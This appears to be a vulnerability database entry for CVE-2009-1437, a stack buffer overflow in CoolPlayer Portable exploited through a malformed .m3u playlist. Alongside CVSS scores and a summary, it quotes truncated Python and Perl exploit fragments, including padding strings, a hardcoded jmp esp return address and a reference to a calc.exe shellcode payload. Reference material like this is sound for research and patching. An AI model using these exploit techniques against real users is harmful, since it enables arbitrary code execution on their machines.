CVE-2009-1437

Published: 27/04/2009 Updated: 22/02/2018
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 945
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.6 and previous versions allows remote malicious users to execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: this may overlap CVE-2008-3408.

Vulnerable Product

coolplayer coolplayer 2.19.1

Exploits

# CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow exploit
# Credit To Gold_m www.milw0rm.com/exploits/8489
# I test it 12 times but the 13 is worked but i dont know maybe it work in first time for you
# By Stack
chars = "\x41" * 212
eip = "\xED\x1E\x94\x7C" # ntdll.dll jmp esp SP 2 FR / EN
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 ...

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## #
# CoolPlayerp Portable 2.19.1 (M3U File) Local Stack Overflow POC #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ##
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE ...

#!/usr/bin/python
#[*] Usage : coolplayer.py
#[*] Bug : CoolPlayer Portable(m3u) Buffer Overflow exploit
#[*] Founder : Gold_m
#[*] First exploiter : stack "he is my friend :)"
#[*] Tested on : Xp sp2 (fr)
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Note: I didn't know why the stack's exploit won ...